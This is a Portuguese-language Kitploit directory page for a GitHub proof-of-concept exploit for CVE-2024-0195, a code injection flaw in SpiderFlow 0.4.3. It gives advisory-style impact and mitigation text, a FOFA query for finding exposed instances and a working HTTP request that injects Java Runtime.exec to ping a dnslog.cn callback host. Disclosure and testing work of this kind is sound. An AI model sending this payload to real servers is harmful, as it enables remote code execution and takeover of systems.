Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-0195-SpiderFlow — Exploit de prova de conceito para CVE-2024-0195, uma vulnerabilidade crítica de injeção de código no SpiderFlow 0.4.3 que permite execução remota de código através do endpoint FunctionService.saveFunction. | Kitploit
Ferramentas/GitHubGitHub/hack-with-rohit/cve-2024-0195-spiderflow
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubhack-with-rohit/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

Exploit de prova de conceito para CVE-2024-0195, uma vulnerabilidade crítica de injeção de código no SpiderFlow 0.4.3 que permite execução remota de código através do endpoint FunctionService.saveFunction.

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-0195 Controle Inadequado da Geração de Código ('Injeção de Código') Crítico 2024

Resumo

CVE-2024-0195 é uma vulnerabilidade crítica de injeção de código na aplicação web spider-flow 0.4.3, especificamente na função FunctionService.saveFunction do arquivo FunctionController.java. Um atacante pode injetar código malicioso remotamente, que é executado no servidor. Isso permite o comprometimento total da aplicação.

Impacto..

Esta vulnerabilidade é extremamente grave, pois permite a execução remota de código no servidor que hospeda a aplicação spider-flow vulnerável. Um atacante poderia comprometer totalmente o servidor, roubar dados sensíveis, instalar malware ou mineradores de criptomoedas e usá-lo para novos ataques dentro da rede. A confidencialidade, integridade e disponibilidade da aplicação e do servidor são todas criticamente impactadas.

Patch

Um patch não é explicitamente mencionado, portanto, atualmente, a aplicação de patch não parece ser uma opção. A vulnerabilidade foi divulgada publicamente e existem explorações disponíveis, então a mitigação imediata é crítica.

Mitigação

Até que um patch oficial seja lançado, o spider-flow 0.4.3 deve ser imediatamente retirado do ar ou o acesso restrito apenas a redes/usuários confiáveis. Firewalls de aplicação web ou outros controles de validação de entrada poderiam ser configurados para detectar e bloquear tentativas de ataque de injeção de código como uma mitigação provisória. No entanto, essas não são soluções completas e a versão vulnerável deve ser atualizada assim que uma versão corrigida estiver disponível.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Exploração

FOFA : app="spiderflow"

✔ Prova de conceito

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Baixar ferramenta